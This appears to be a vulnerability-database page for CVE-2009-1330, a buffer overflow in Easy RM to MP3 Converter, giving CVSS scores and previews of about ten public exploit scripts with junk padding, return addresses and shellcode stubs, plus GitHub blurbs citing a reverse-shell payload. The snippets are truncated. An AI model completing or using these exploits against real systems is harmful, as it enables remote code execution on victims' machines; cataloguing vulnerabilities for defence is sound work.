9.3
CVSSv2

CVE-2009-1330

Published: 17/04/2009 Updated: 29/09/2017
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
VMScore: 982
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in Easy RM to MP3 Converter allows remote malicious users to execute arbitrary code via a long filename in a playlist (.pls) file.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

mini-stream easy rm to mp3 converter

Exploits

Easy RM to MP3 Converter version 273700 m3u exploit with universal DEP + ASLR bypass ...
# # Exploit for Easy RM to MP3 273700 on Windows Xp sp3 # By d3b4g # tested on Windows XP SP3 # version:273700 # Date:221209 # From tiny islands of maldivies # my $file= "d3b4gm3u"; my $junk= "A" x 26071; my $eip = pack('V',0x7C836A08); #jmp esp from kernel32dll my $shellcode = "\x90" x 30; # windows/exec - 144 bytes # Thanks to http ...
#!/usr/bin/perl # # # ************************************************************************ # * ASX to MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...
# Exploit Title: Easy RM to MP3 Converter 273700 (m3u) File BoF Exploit with Universal DEP+ASLR bypass # Date: 2016-06-12 # Exploit Author: Csaba Fitzl # Vendor Homepage: N/A # Software Link: wwwexploit-dbcom/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converterexe # Version: 273700 # Tested on: Windows 7 x64 # CVE : CVE-2009 ...
#!/usr/bin/python # Easy RM to MP3 Converter Universall Stack Overflow Exploit # By Stack # hihihi # StaKer : Only Fabri Fibra :d header = ( "\x5B\x70\x6C\x61\x79\x6C\x69\x73\x74\x5D" "\x0A\x4E\x75\x6D\x62\x65\x72\x4F\x66\x45" "\x6E\x74\x72\x69\x65\x73\x3D\x31\x0A\x46" "\x69\x6C\x65\x31\x3D") junk = "\x41"*1244 eip = "\xDB\x70\xBB\x01" # Universal ...
#!/usr/bin/perl # # # ********************************************************* # * RM Downloader (M3U File) Local Stack Overflow POC * # ********************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz : Hussin X ...
// Exploit Title: Easy RM to MP3 273700 local Buffer OverFlow Exploit on xp sp2 // Date: 24/12/2009 // Author: bibi-info // Software Link: wwwrm-to-mp3net/EasyRMtoMP3Converterexe // Version: 273700 // Tested on: Windows Xp sp2 // greetz : His0k4 & All friends & muslims HaCkers(dz) (18/11/2009 ) #include<stdioh> #incl ...
#!/usr/bin/perl # # # ************************************************************* # * WM Downloader (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...
# Exploit Title: Easy RM to MP3 273700 Local Buffer Overflow (m3u , pls , smi , wpl , wax , wvx , ram) # Date: 4 / 8 / 2010 # Author: Oh Yaw Theng # Version: 273700 # Tested on: Windows XP SP 1 # CVE : N / A #!/usr/bin/python # This exploit works for all the file extensions mention above # User just need to change the file extension ...
#!/usr/bin/perl # # # ************************************************************* # * Mini-stream Ripper (M3U File) Local Stack Overflow POC * # ************************************************************* # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYCoM ; WwWNo-ExploitCoM # Greetz ...
#!/usr/bin/perl # # # ************************************************************************ # * Mini-stream RM-MP3 Converter (M3U File) Local Stack Overflow POC * # ************************************************************************ # # Found By : Cyber-Zone (ABDELKHALEK) # E-mail : Paradis_des_fous@hotmailfr # Home : WwWIQ-TYC ...

Github Repositories

Reversing Binaries

Microsoft Vulnerability Exploitation Hi everyone welcome to the world of malware analysis and blackhat exploitation In this repository I am going to show you every possible way to exploit microsoft windows softwares and related applications Firstly I would like to share exploitation "Proof Of Concept" in third party applications which have high servity risk As we k

CVE-2009-1330 - Easy RM to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3

CVE-2009-1330

Reversing Binaries

Microsoft Vulnerability Exploitation Hi everyone welcome to the world of malware analysis and blackhat exploitation In this repository I am going to show you every possible way to exploit microsoft windows softwares and related applications Firstly I would like to share exploitation "Proof Of Concept" in third party applications which have high servity risk As we k

Reversing Binaries

Microsoft Vulnerability Exploitation Hi everyone welcome to the world of malware analysis and blackhat exploitation In this repository I am going to show you every possible way to exploit microsoft windows softwares and related applications Firstly I would like to share exploitation "Proof Of Concept" in third party applications which have high servity risk As we k

Simple exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows 7 32b.

CVE-2009-1330 Exploit for buffer overflow in Easy RM to MP3 Converter 273700 (CVE-2009-1330) Based on: pwntools msfvenom / reverse_tcp payload ropper x64dbg Easy RM to MP3 Converter 273700 Vulnerable app available at wwwexploit-dbcom/exploits/10374